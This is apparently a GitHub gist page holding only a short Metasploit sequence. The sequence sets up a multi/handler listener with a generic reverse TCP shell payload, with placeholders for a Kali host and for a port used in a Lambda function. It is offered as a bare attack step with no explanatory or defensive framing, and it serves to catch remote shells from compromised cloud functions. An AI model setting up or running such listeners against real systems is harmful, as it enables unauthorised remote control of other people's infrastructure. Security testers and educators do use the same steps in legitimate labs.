Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save Moos1e/342d8a1a44e31048367ff20d34dec490 to your computer and use it in GitHub Desktop.
Save Moos1e/342d8a1a44e31048367ff20d34dec490 to your computer and use it in GitHub Desktop.
$ use exploit/multi/handler
$ set payload generic/shell_reverse_tcp
$ set lhost {set this to your kali DNS name}
$ set lport {set this to the port in your lambda function}
$ run
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment